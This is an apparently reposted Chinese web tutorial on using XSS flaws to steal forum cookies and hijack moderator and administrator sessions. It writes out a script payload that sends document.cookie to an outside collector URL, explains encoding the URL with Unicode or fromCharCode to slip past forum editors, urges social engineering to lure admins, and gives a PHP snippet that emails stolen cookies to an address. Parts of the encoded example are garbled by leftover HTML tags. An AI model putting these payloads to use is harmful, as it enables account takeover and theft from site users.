首页 > web前端 > js教程 > 正文

XSS攻击Cookie欺骗中隐藏JavaScript执行

高洛峰
发布: 2016-11-25 09:45:00
原创
1450 人浏览过

比如发现一处可XSS地方:
<script>alert(不管怎么样弹出就好)</script>

自己弄个偷cookie的文件。

目的是让其他浏览者去浏览我们设计好的陷阱
<script>document.location=http://URL.com/cookie.php?cookie=&#39;+escape(document.cookie) </script>

怎么弄其实也不用我多说了。。

现在主要说的是如何隐藏JavaScript执行。

大家可能习惯每天去milw0rm.com看EXP,

每当发布XSS漏洞的EXP,当我们利用的时候。

却无法cookie任何信息,这是为什么呢。。

像魔力,PHPBB这样大型的论坛都具备XSS漏洞。

我给的这个
<script>document.location=http://URL.com/cookie.php?cookie=&#39;+escape(document.cookie) </script>

会显示Javascript 错误。

解决办法有2种,我们可以把外部敏感信息用unicode编码

给个URL:http://www.mikezilla.com/exp0012.html

通过编码就是这样:
<script>eval(location.href="http://www.php1.cn/"><br>上述还不行就用第2种方法<br><br>Javascript fromCharCode中的eval功能<br><br>上面说了可以用unicode编码过一些站<br><br>比如编码后的104,116,116,112就是HTTP<br><br>如果论坛用了其他的编辑器,比如PHPWind 用的所见所得编辑器<br><br>直接打上http://url.com肯定会暴露。<br><br>那么我们就看编辑器的形式来调换URL<br><br>比如偷COOKIE的站是http://www.URL.com<br><br>我们就这样<br>http://www.url.com<br><br>当然显示的部分你可以替换成吸引人的信息骗取管理和斑竹的点击<br><br>用一点社会工程学就可以了。。<br><br>好了现在都完成了初步的设想,开始实现吧<br><br>第1步:管理看见我们构造好的陷阱,并且点了他<br><br>第2步:Javascript 执行成功了。。。<br><br>第3步:构造好的偷COOKIE文件偷取到Cookie<br><br>第4步:我们不可能傻到URL连接是纯文本,将URL用Unicode编码(这里习惯说是加密)http://www.mikezilla.com/exp0012.html<br><br>第5步:截取的Cookie信息当然不是明文的,我们只要使用FireFox Cookie 编辑器<br>替换COOKIE就OK了,或者用CookieEditor等其他工具。。<br><br>个人建议:偷取Cookie不一定就使用空间收取Cookie信息<br>比如构造个邮箱收取就这样<br><?<br/><br/>mail("hackeroo@hotmail.com","cookie monster",$_REQUEST[cookie]);<br/><br/>?><br><html><br><script>document.location=http://www.URL.com/&#39;</script>


好了偷到有价值的信息替换Cookie就行了。。替换斑竹的就是斑竹权限,替换管理的就和是管理权限。。

相关标签:
来源:php.cn
本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板